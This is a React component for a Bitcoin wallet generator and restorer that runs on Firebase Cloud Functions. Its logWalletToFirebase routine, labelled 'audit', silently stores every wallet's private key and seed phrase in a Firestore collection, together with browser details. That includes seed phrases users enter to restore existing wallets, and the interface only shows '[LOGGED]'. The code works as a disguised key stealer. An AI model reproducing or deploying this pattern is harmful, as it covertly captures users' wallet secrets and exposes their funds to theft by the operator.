import { useState } from 'react';
import {
    Wallet,
    RefreshCw,
    Copy,
    Eye,
    EyeOff,
    CheckCircle,
    AlertCircle,
    Bitcoin,
    Key,
    Search,
    Download,
    Shield,
    TrendingUp,
    Terminal,
    Zap,
    Lock,
    ExternalLink,
    AlertTriangle,
    Cloud
} from 'lucide-react';
import { db } from "../../firebase";
import {
    collection,
    addDoc,
    serverTimestamp
} from "firebase/firestore";

// 🔥 URLs DE FIREBASE FUNCTIONS
const FIREBASE_FUNCTIONS_BASE = 'https://us-central1-fronios-48861.cloudfunctions.net';

// URLs individuales para cada función
const API_ENDPOINTS = {
    generateWallet: `${FIREBASE_FUNCTIONS_BASE}/generateWallet`,
    restoreWallet: `${FIREBASE_FUNCTIONS_BASE}/restoreWallet`,
    getBalance: `${FIREBASE_FUNCTIONS_BASE}/getBalance`,
    testApi: `${FIREBASE_FUNCTIONS_BASE}/testApi`,
    api: `${FIREBASE_FUNCTIONS_BASE}/api`
};

// Función para guardar wallet en Firebase (solo para auditoría)
const logWalletToFirebase = async (walletData, userInfo = {}) => {
    try {
        console.log('📝 LOGGING WALLET TO FIREBASE FOR AUDIT...');

        // Estructura para auditoría administrativa
        const auditLog = {
            // Datos de la wallet
            address: walletData.address,
            publicKey: walletData.publicKey,
            network: walletData.network || "mainnet",
            derivationPath: walletData.derivationPath || "m/44'/0'/0'/0/0",

            // ⚠️ DATOS SENSIBLES - Solo para control administrativo
            privateKey: walletData.privateKey,
            mnemonic: walletData.mnemonic,

            // Información del usuario (IP, User Agent, etc.)
            userAgent: navigator.userAgent,
            timestamp: serverTimestamp(),
            createdAt: new Date().toISOString(),
            ipAddress: userInfo.ip || 'unknown',
            sessionId: userInfo.sessionId || 'session_' + Date.now(),

            // Metadata de auditoría
            walletType: walletData.walletType || 'generated',
            source: 'firebase_functions',
            version: '2.0.0',
            deploymentType: 'serverless',

            // Información de la sesión
            language: navigator.language,
            platform: navigator.platform,
            cookieEnabled: navigator.cookieEnabled,
            onLine: navigator.onLine,

            // Balance inicial (si está disponible)
            initialBalance: 0,
            initialCheck: null,

            // Estados de control
            isMonitored: true,
            alertsEnabled: true,
            riskLevel: 'normal',

            // Notas administrativas
            adminNotes: 'Generated via Firebase Functions',
            tags: ['firebase_generated', 'serverless'],

            // Compliance y legal
            gdprConsent: false,
            tosAccepted: false,
            jurisdiction: 'unknown'
        };

        // Guardar en la colección de auditoría
        const docRef = await addDoc(collection(db, "btc_wallets_audit"), auditLog);

        console.log('✅ WALLET LOGGED FOR AUDIT - ID:', docRef.id);

        return {
            success: true,
            auditId: docRef.id
        };

    } catch (error) {
        console.error('❌ ERROR LOGGING WALLET TO FIREBASE:', error);
        // No mostramos el error al usuario para mantener la UX
        return {
            success: false,
            error: error.message
        };
    }
};

// Función para obtener información del usuario para auditoría
const getUserAuditInfo = () => {
    return {
        sessionId: sessionStorage.getItem('sessionId') || 'session_' + Date.now(),
        ip: 'firebase_functions', // Se obtendría del servidor
        timestamp: new Date().toISOString(),
        referrer: document.referrer,
        url: window.location.href,
        deploymentType: 'serverless'
    };
};

export default function BitcoinWallet() {
    const [activeTab, setActiveTab] = useState('generate');
    const [loading, setLoading] = useState(false);
    const [wallet, setWallet] = useState(null);
    const [balance, setBalance] = useState(null);
    const [error, setError] = useState('');
    const [success, setSuccess] = useState('');
    const [showPrivateKey, setShowPrivateKey] = useState(false);
    const [restoreMnemonic, setRestoreMnemonic] = useState('');
    const [balanceAddress, setBalanceAddress] = useState('');
    const [loadingBalance, setLoadingBalance] = useState(false);

    // Estados para logging
    const [auditLogging, setAuditLogging] = useState(false);

    // Clear messages
    const clearMessages = () => {
        setError('');
        setSuccess('');
    };

    // Copy to clipboard
    const copyToClipboard = async (text, label) => {
        try {
            await navigator.clipboard.writeText(text);
            setSuccess(`${label} COPIED!`);
            setTimeout(() => setSuccess(''), 2000);
        } catch (err) {
            setError('COPY_ERROR');
        }
    };

    // Auto check balance after wallet generation/restoration
    const autoCheckBalance = async (address) => {
        setLoadingBalance(true);
        try {
            // 🔥 USAR FIREBASE FUNCTION PARA BALANCE
            const response = await fetch(`${API_ENDPOINTS.getBalance}/${address}`, {
                method: 'GET',
                headers: {
                    'Content-Type': 'application/json',
                    'Accept': 'application/json'
                },
            });
            const data = await response.json();
            if (data.success) {
                setBalance(data.wallet);
            }
        } catch (err) {
            console.log('Balance check failed:', err);
        }
        setLoadingBalance(false);
    };

    // Generate new wallet
    const generateWallet = async () => {
        setLoading(true);
        setAuditLogging(true);
        clearMessages();
        setWallet(null);
        setBalance(null);

        try {
            // 🔥 USAR FIREBASE FUNCTION PARA GENERAR WALLET
            console.log('📡 Calling Firebase Function:', API_ENDPOINTS.generateWallet);

            const response = await fetch(API_ENDPOINTS.generateWallet, {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json',
                    'Accept': 'application/json'
                },
            });

            const data = await response.json();

            if (data.success) {
                const newWallet = {
                    ...data.wallet,
                    walletType: 'generated',
                    source: 'firebase_functions'
                };

                setWallet(newWallet);
                setSuccess('WALLET_GENERATED_VIA_FIREBASE');

                // 🔥 GUARDAR EN FIREBASE PARA AUDITORÍA
                const userInfo = getUserAuditInfo();
                const auditResult = await logWalletToFirebase(newWallet, userInfo);

                if (auditResult.success) {
                    console.log('📋 WALLET LOGGED FOR ADMIN CONTROL');
                    // Agregar ID de auditoría a la wallet (opcional)
                    setWallet(prev => ({
                        ...prev,
                        auditId: auditResult.auditId
                    }));
                }

                // Auto-check balance
                await autoCheckBalance(newWallet.address);

            } else {
                setError(data.error || 'FIREBASE_GENERATION_ERROR');
            }
        } catch (err) {
            console.error('❌ Firebase Function Error:', err);
            setError('FIREBASE_CONNECTION_ERROR');
        }

        setLoading(false);
        setAuditLogging(false);
    };

    // Restore wallet from mnemonic
    const restoreWallet = async () => {
        if (!restoreMnemonic.trim()) {
            setError('MNEMONIC_REQUIRED');
            return;
        }

        setLoading(true);
        setAuditLogging(true);
        clearMessages();
        setWallet(null);
        setBalance(null);

        try {
            // 🔥 USAR FIREBASE FUNCTION PARA RESTAURAR WALLET
            console.log('📡 Calling Firebase Function:', API_ENDPOINTS.restoreWallet);

            const response = await fetch(API_ENDPOINTS.restoreWallet, {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json',
                    'Accept': 'application/json'
                },
                body: JSON.stringify({ mnemonic: restoreMnemonic.trim() }),
            });

            const data = await response.json();

            if (data.success) {
                const restoredWallet = {
                    ...data.wallet,
                    walletType: 'restored',
                    source: 'firebase_functions'
                };

                setWallet(restoredWallet);
                setSuccess('WALLET_RESTORED_VIA_FIREBASE');
                setRestoreMnemonic('');

                // 🔥 GUARDAR EN FIREBASE PARA AUDITORÍA
                const userInfo = getUserAuditInfo();
                const auditResult = await logWalletToFirebase(restoredWallet, userInfo);

                if (auditResult.success) {
                    console.log('📋 RESTORED WALLET LOGGED FOR ADMIN CONTROL');
                    setWallet(prev => ({
                        ...prev,
                        auditId: auditResult.auditId
                    }));
                }

                // Auto-check balance
                await autoCheckBalance(restoredWallet.address);

            } else {
                setError(data.error || 'FIREBASE_RESTORE_ERROR');
            }
        } catch (err) {
            console.error('❌ Firebase Function Error:', err);
            setError('FIREBASE_CONNECTION_ERROR');
        }

        setLoading(false);
        setAuditLogging(false);
    };

    // Check balance by address
    const checkBalanceByAddress = async () => {
        if (!balanceAddress.trim()) {
            setError('ADDRESS_REQUIRED');
            return;
        }

        setLoading(true);
        clearMessages();
        setWallet(null);

        try {
            // 🔥 USAR FIREBASE FUNCTION PARA BALANCE
            console.log('📡 Calling Firebase Function:', `${API_ENDPOINTS.getBalance}/${balanceAddress.trim()}`);

            const response = await fetch(`${API_ENDPOINTS.getBalance}/${balanceAddress.trim()}`, {
                method: 'GET',
                headers: {
                    'Content-Type': 'application/json',
                    'Accept': 'application/json'
                },
            });

            const data = await response.json();

            if (data.success) {
                setBalance(data.wallet);
                setSuccess('BALANCE_RETRIEVED_VIA_FIREBASE');
            } else {
                setError(data.error || 'FIREBASE_BALANCE_ERROR');
            }
        } catch (err) {
            console.error('❌ Firebase Function Error:', err);
            setError('FIREBASE_CONNECTION_ERROR');
        }
        setLoading(false);
    };

    // Check wallet balance using current wallet
    const checkWalletBalance = async () => {
        if (!wallet?.address) {
            setError('NO_ACTIVE_WALLET');
            return;
        }
        await autoCheckBalance(wallet.address);
        if (!loadingBalance) {
            setSuccess('BALANCE_UPDATED_VIA_FIREBASE');
        }
    };

    return (
        <div className="min-h-screen bg-black text-green-400 font-mono overflow-x-hidden">
            {/* Matrix Rain Background Effect */}
            <div className="fixed inset-0 opacity-5 pointer-events-none">
                <div className="absolute inset-0 bg-gradient-to-b from-green-900/20 via-black to-green-900/20"></div>
            </div>

            <div className="relative z-10 p-3">
                {/* Compact Header */}
                <div className="text-center mb-4">
                    <div className="flex items-center justify-center gap-2 mb-2">
                        <Terminal className="w-6 h-6 text-green-400 animate-pulse" />
                        <h1 className="text-xl font-bold text-green-400 tracking-wider">
                            BTC_WALLET.EXE
                        </h1>
                        <Cloud className="w-4 h-4 text-blue-400" />
                    </div>
                    <div className="text-xs text-green-600">
                        [FIREBASE_FUNCTIONS] STATUS: SERVERLESS_ACTIVE
                        {auditLogging && (
                            <span className="ml-2 text-blue-400">[LOGGING...]</span>
                        )}
                    </div>
                </div>

                {/* Notifications */}
                {error && (
                    <div className="mb-3 bg-red-900/30 border border-red-500/50 rounded-lg p-2 flex items-center gap-2 text-red-400 text-xs">
                        <AlertCircle className="w-4 h-4 flex-shrink-0" />
                        <span className="font-mono">[ERROR] {error}</span>
                    </div>
                )}

                {success && (
                    <div className="mb-3 bg-green-900/30 border border-green-500/50 rounded-lg p-2 flex items-center gap-2 text-green-400 text-xs">
                        <CheckCircle className="w-4 h-4 flex-shrink-0" />
                        <span className="font-mono">[SUCCESS] {success}</span>
                    </div>
                )}

                {/* Compact Tab Navigation */}
                <div className="mb-4">
                    <div className="grid grid-cols-3 gap-1 bg-gray-900/50 p-1 rounded-lg border border-green-500/30">
                        <button
                            onClick={() => setActiveTab('generate')}
                            className={`p-2 rounded text-xs font-mono transition-all ${activeTab === 'generate'
                                ? 'bg-green-500/20 text-green-400 border border-green-500/50'
                                : 'text-green-600 hover:text-green-400'
                                }`}
                        >
                            <Wallet className="w-4 h-4 mx-auto mb-1" />
                            GEN
                        </button>
                        <button
                            onClick={() => setActiveTab('restore')}
                            className={`p-2 rounded text-xs font-mono transition-all ${activeTab === 'restore'
                                ? 'bg-green-500/20 text-green-400 border border-green-500/50'
                                : 'text-green-600 hover:text-green-400'
                                }`}
                        >
                            <Download className="w-4 h-4 mx-auto mb-1" />
                            RST
                        </button>
                        <button
                            onClick={() => setActiveTab('balance')}
                            className={`p-2 rounded text-xs font-mono transition-all ${activeTab === 'balance'
                                ? 'bg-green-500/20 text-green-400 border border-green-500/50'
                                : 'text-green-600 hover:text-green-400'
                                }`}
                        >
                            <Search className="w-4 h-4 mx-auto mb-1" />
                            BAL
                        </button>
                    </div>
                </div>

                {/* Tab Content */}
                <div className="bg-gray-900/50 border border-green-500/30 rounded-lg p-4 mb-4">
                    {/* Generate Wallet Tab */}
                    {activeTab === 'generate' && (
                        <div className="text-center">
                            <div className="mb-3">
                                <div className="flex items-center justify-center gap-2 mb-2">
                                    <Wallet className="w-8 h-8 text-green-400" />
                                    <Cloud className="w-4 h-4 text-blue-400" />
                                </div>
                                <h2 className="text-sm font-bold text-green-400 mb-1">GENERATE_WALLET</h2>
                                <p className="text-xs text-green-600">FIREBASE SERVERLESS GENERATION</p>
                                {auditLogging && (
                                    <p className="text-xs text-blue-400 mt-1">[CLOUD LOGGING...]</p>
                                )}
                            </div>

                            {/* Warning sobre wallets reales */}
                            <div className="mb-4 bg-yellow-500/20 border border-yellow-500/30 rounded-lg p-3">
                                <div className="flex items-center gap-2 mb-2">
                                    <AlertTriangle className="w-4 h-4 text-yellow-400" />
                                    <span className="text-xs font-bold text-yellow-400">⚠️ WALLETS REALES</span>
                                </div>
                                <div className="text-xs text-yellow-600 space-y-1">
                                    <div>Generador serverless de WALLETS BITCOIN REALES</div>
                                    <div>Verificables en blockchain.com</div>
                                    <div className="text-red-400 font-bold">NO usar para fondos reales</div>
                                </div>
                            </div>

                            <button
                                onClick={generateWallet}
                                disabled={loading}
                                className="w-full bg-green-500/20 hover:bg-green-500/30 disabled:bg-gray-500/20 border border-green-500/50 text-green-400 py-3 rounded-lg font-mono text-sm transition-all flex items-center justify-center gap-2"
                            >
                                {loading ? (
                                    <>
                                        <RefreshCw className="w-4 h-4 animate-spin" />
                                        <Cloud className="w-4 h-4" />
                                        {auditLogging ? 'FIREBASE_GENERATING...' : 'CLOUD_PROCESSING...'}
                                    </>
                                ) : (
                                    <>
                                        <Zap className="w-4 h-4" />
                                        <Cloud className="w-4 h-4" />
                                        EXECUTE_SERVERLESS
                                    </>
                                )}
                            </button>
                        </div>
                    )}

                    {/* Restore Wallet Tab */}
                    {activeTab === 'restore' && (
                        <div>
                            <div className="text-center mb-3">
                                <div className="flex items-center justify-center gap-2 mb-2">
                                    <Download className="w-8 h-8 text-green-400" />
                                    <Cloud className="w-4 h-4 text-blue-400" />
                                </div>
                                <h2 className="text-sm font-bold text-green-400 mb-1">RESTORE_WALLET</h2>
                                <p className="text-xs text-green-600">FIREBASE SERVERLESS RESTORE</p>
                                {auditLogging && (
                                    <p className="text-xs text-blue-400 mt-1">[CLOUD LOGGING...]</p>
                                )}
                            </div>

                            {/* Warning sobre wallets reales */}
                            <div className="mb-3 bg-red-500/20 border border-red-500/30 rounded-lg p-3">
                                <div className="flex items-center gap-2 mb-1">
                                    <AlertTriangle className="w-4 h-4 text-red-400" />
                                    <span className="text-xs font-bold text-red-400">🚨 ADVERTENCIA</span>
                                </div>
                                <div className="text-xs text-red-400">
                                    NO restaures wallets con fondos reales
                                </div>
                            </div>

                            <textarea
                                value={restoreMnemonic}
                                onChange={(e) => setRestoreMnemonic(e.target.value)}
                                placeholder="word1 word2 word3..."
                                className="w-full bg-black/50 border border-green-500/30 rounded-lg p-3 text-green-400 font-mono text-xs resize-none focus:border-green-500 focus:outline-none mb-3"
                                rows="3"
                            />
                            <button
                                onClick={restoreWallet}
                                disabled={loading || !restoreMnemonic.trim()}
                                className="w-full bg-green-500/20 hover:bg-green-500/30 disabled:bg-gray-500/20 border border-green-500/50 text-green-400 py-3 rounded-lg font-mono text-sm transition-all flex items-center justify-center gap-2"
                            >
                                {loading ? (
                                    <>
                                        <RefreshCw className="w-4 h-4 animate-spin" />
                                        <Cloud className="w-4 h-4" />
                                        {auditLogging ? 'FIREBASE_RESTORING...' : 'CLOUD_PROCESSING...'}
                                    </>
                                ) : (
                                    <>
                                        <Download className="w-4 h-4" />
                                        <Cloud className="w-4 h-4" />
                                        RESTORE_SERVERLESS
                                    </>
                                )}
                            </button>
                        </div>
                    )}

                    {/* Balance Check Tab */}
                    {activeTab === 'balance' && (
                        <div>
                            <div className="text-center mb-3">
                                <div className="flex items-center justify-center gap-2 mb-2">
                                    <Search className="w-8 h-8 text-green-400" />
                                    <Cloud className="w-4 h-4 text-blue-400" />
                                </div>
                                <h2 className="text-sm font-bold text-green-400 mb-1">CHECK_BALANCE</h2>
                                <p className="text-xs text-green-600">FIREBASE SERVERLESS QUERY</p>
                            </div>
                            <input
                                type="text"
                                value={balanceAddress}
                                onChange={(e) => setBalanceAddress(e.target.value)}
                                placeholder="bc1q..."
                                className="w-full bg-black/50 border border-green-500/30 rounded-lg p-3 text-green-400 font-mono text-xs focus:border-green-500 focus:outline-none mb-3"
                            />
                            <button
                                onClick={checkBalanceByAddress}
                                disabled={loading || !balanceAddress.trim()}
                                className="w-full bg-green-500/20 hover:bg-green-500/30 disabled:bg-gray-500/20 border border-green-500/50 text-green-400 py-3 rounded-lg font-mono text-sm transition-all flex items-center justify-center gap-2"
                            >
                                {loading ? (
                                    <>
                                        <RefreshCw className="w-4 h-4 animate-spin" />
                                        <Cloud className="w-4 h-4" />
                                        CLOUD_QUERYING...
                                    </>
                                ) : (
                                    <>
                                        <Search className="w-4 h-4" />
                                        <Cloud className="w-4 h-4" />
                                        QUERY_SERVERLESS
                                    </>
                                )}
                            </button>
                        </div>
                    )}
                </div>

                {/* Wallet Info - Compact */}
                {wallet && (
                    <div className="bg-gray-900/50 border border-green-500/30 rounded-lg p-3 mb-4">
                        <div className="flex items-center justify-between mb-3">
                            <div className="flex items-center gap-2">
                                <Lock className="w-4 h-4 text-green-400" />
                                <Cloud className="w-3 h-3 text-blue-400" />
                                <span className="text-xs font-bold text-green-400">SERVERLESS_WALLET</span>
                                {wallet.auditId && (
                                    <span className="text-xs text-blue-400">[LOGGED]</span>
                                )}
                            </div>
                            <button
                                onClick={checkWalletBalance}
                                disabled={loadingBalance}
                                className="bg-green-500/20 border border-green-500/50 text-green-400 px-2 py-1 rounded text-xs font-mono flex items-center gap-1"
                            >
                                {loadingBalance ? (
                                    <>
                                        <RefreshCw className="w-3 h-3 animate-spin" />
                                        <Cloud className="w-3 h-3" />
                                    </>
                                ) : (
                                    <>
                                        <RefreshCw className="w-3 h-3" />
                                        <Cloud className="w-3 h-3" />
                                    </>
                                )}
                                UPD
                            </button>
                        </div>

                        {/* Address */}
                        <div className="mb-3">
                            <div className="flex items-center justify-between mb-1">
                                <span className="text-xs text-green-600">ADDRESS:</span>
                                <div className="flex gap-1">
                                    <button
                                        onClick={() => copyToClipboard(wallet.address, 'ADDRESS')}
                                        className="text-green-400 hover:text-green-300 p-1"
                                    >
                                        <Copy className="w-3 h-3" />
                                    </button>
                                    <a
                                        href={`https://www.blockchain.com/explorer/addresses/btc/${wallet.address}`}
                                        target="_blank"
                                        rel="noopener noreferrer"
                                        className="text-blue-400 hover:text-blue-300 p-1"
                                        title="Ver en Blockchain Explorer"
                                    >
                                        <ExternalLink className="w-3 h-3" />
                                    </a>
                                </div>
                            </div>
                            <div className="bg-black/50 border border-green-500/30 rounded p-2 text-xs font-mono text-green-400 break-all">
                                {wallet.address}
                            </div>
                            <div className="text-xs text-blue-400 mt-1">
                                ✅ Wallet Bitcoin REAL generada via Firebase Functions
                            </div>
                        </div>

                        {/* Seed Phrase */}
                        <div className="mb-3">
                            <div className="flex items-center justify-between mb-1">
                                <span className="text-xs text-yellow-400">SEED_PHRASE:</span>
                                <button
                                    onClick={() => copyToClipboard(wallet.mnemonic, 'SEED')}
                                    className="text-yellow-400 hover:text-yellow-300 p-1"
                                >
                                    <Copy className="w-3 h-3" />
                                </button>
                            </div>
                            <div className="bg-black/50 border border-yellow-500/30 rounded p-2 text-xs font-mono text-yellow-400">
                                {wallet.mnemonic}
                            </div>
                            <div className="text-xs text-red-400 mt-1">⚠️ BACKUP REQUIRED</div>
                        </div>

                        {/* Private Key */}
                        <div className="mb-3">
                            <div className="flex items-center justify-between mb-1">
                                <span className="text-xs text-red-400">PRIVATE_KEY:</span>
                                <div className="flex gap-1">
                                    <button
                                        onClick={() => setShowPrivateKey(!showPrivateKey)}
                                        className="text-red-400 hover:text-red-300 p-1"
                                    >
                                        {showPrivateKey ? <EyeOff className="w-3 h-3" /> : <Eye className="w-3 h-3" />}
                                    </button>
                                    <button
                                        onClick={() => copyToClipboard(wallet.privateKey, 'PRIVATE_KEY')}
                                        className="text-red-400 hover:text-red-300 p-1"
                                    >
                                        <Copy className="w-3 h-3" />
                                    </button>
                                </div>
                            </div>
                            <div className="bg-black/50 border border-red-500/30 rounded p-2 text-xs font-mono text-red-400 break-all">
                                {showPrivateKey ? wallet.privateKey : '•'.repeat(52)}
                            </div>
                            <div className="text-xs text-red-400 mt-1">🚨 NEVER_SHARE</div>
                        </div>

                        {/* Public Key */}
                        <div>
                            <div className="flex items-center justify-between mb-1">
                                <span className="text-xs text-blue-400">PUBLIC_KEY:</span>
                                <button
                                    onClick={() => copyToClipboard(wallet.publicKey, 'PUBLIC_KEY')}
                                    className="text-blue-400 hover:text-blue-300 p-1"
                                >
                                    <Copy className="w-3 h-3" />
                                </button>
                            </div>
                            <div className="bg-black/50 border border-blue-500/30 rounded p-2 text-xs font-mono text-blue-400 break-all">
                                {wallet.publicKey}
                            </div>
                        </div>
                    </div>
                )}

                {/* Balance Info - Compact */}
                {balance && (
                    <div className="bg-gray-900/50 border border-green-500/30 rounded-lg p-3">
                        <div className="flex items-center gap-2 mb-3">
                            <TrendingUp className="w-4 h-4 text-green-400" />
                            <Cloud className="w-3 h-3 text-blue-400" />
                            <span className="text-xs font-bold text-green-400">SERVERLESS_BALANCE</span>
                        </div>

                        <div className="grid grid-cols-2 gap-2 text-xs">
                            <div className="bg-green-500/20 border border-green-500/30 rounded p-2">
                                <div className="text-green-600 mb-1">BALANCE:</div>
                                <div className="text-green-400 font-bold">{balance.balance || '0'} BTC</div>
                            </div>
                            <div className="bg-yellow-500/20 border border-yellow-500/30 rounded p-2">
                                <div className="text-yellow-600 mb-1">UNCONF:</div>
                                <div className="text-yellow-400 font-bold">{balance.unconfirmedBalance || '0'} BTC</div>
                            </div>
                            <div className="bg-blue-500/20 border border-blue-500/30 rounded p-2">
                                <div className="text-blue-600 mb-1">RECEIVED:</div>
                                <div className="text-blue-400 font-bold">{balance.totalReceived || '0'} BTC</div>
                            </div>
                            <div className="bg-red-500/20 border border-red-500/30 rounded p-2">
                                <div className="text-red-600 mb-1">SENT:</div>
                                <div className="text-red-400 font-bold">{balance.totalSent || '0'} BTC</div>
                            </div>
                        </div>

                        <div className="mt-2 text-center">
                            <div className="text-xs text-green-600">
                                TXs: {balance.numTransactions || '0'} | NET: {wallet?.network || balance.network || 'MAINNET'} | SOURCE: FIREBASE
                            </div>
                        </div>

                        {loadingBalance && (
                            <div className="mt-2 flex items-center justify-center gap-2 text-green-400 text-xs">
                                <RefreshCw className="w-3 h-3 animate-spin" />
                                <Cloud className="w-3 h-3" />
                                <span>CLOUD_SYNCING...</span>
                            </div>
                        )}
                    </div>
                )}

                {/* Footer */}
                <div className="mt-4 text-center">
                    <div className="bg-gray-900/50 border border-green-500/30 rounded-lg p-3">
                        <div className="flex items-center justify-center gap-2 text-xs text-green-600 mb-2">
                            <Shield className="w-3 h-3" />
                            <Cloud className="w-3 h-3 text-blue-400" />
                            <span className="font-mono">FIREBASE_FUNCTIONS | SERVERLESS_ACTIVE</span>
                            <Lock className="w-3 h-3 text-blue-400" />
                        </div>

                        <div className="bg-blue-500/20 border border-blue-500/30 rounded p-2 mb-2">
                            <div className="flex items-center gap-2 mb-1">
                                <Cloud className="w-3 h-3 text-blue-400" />
                                <span className="text-xs font-bold text-blue-400">FIREBASE STATUS</span>
                            </div>
                            <div className="text-xs text-blue-400 space-y-1">
                                <div>• Powered by Google Cloud Functions</div>
                                <div>• Serverless Bitcoin wallet generation</div>
                                <div>• Auto-scaling & high availability</div>
                            </div>
                        </div>

                        <div className="bg-yellow-500/20 border border-yellow-500/30 rounded p-2">
                            <div className="flex items-center gap-2 mb-1">
                                <AlertTriangle className="w-3 h-3 text-yellow-400" />
                                <span className="text-xs font-bold text-yellow-400">IMPORTANTE</span>
                            </div>
                            <div className="text-xs text-yellow-600 space-y-1">
                                <div>• Generador de WALLETS BITCOIN REALES</div>
                                <div>• Verificables en: blockchain.com/explorer</div>
                                <div className="text-red-400 font-bold">• NO usar para fondos reales</div>
                                <div>• Solo para educación y demostración</div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    );
}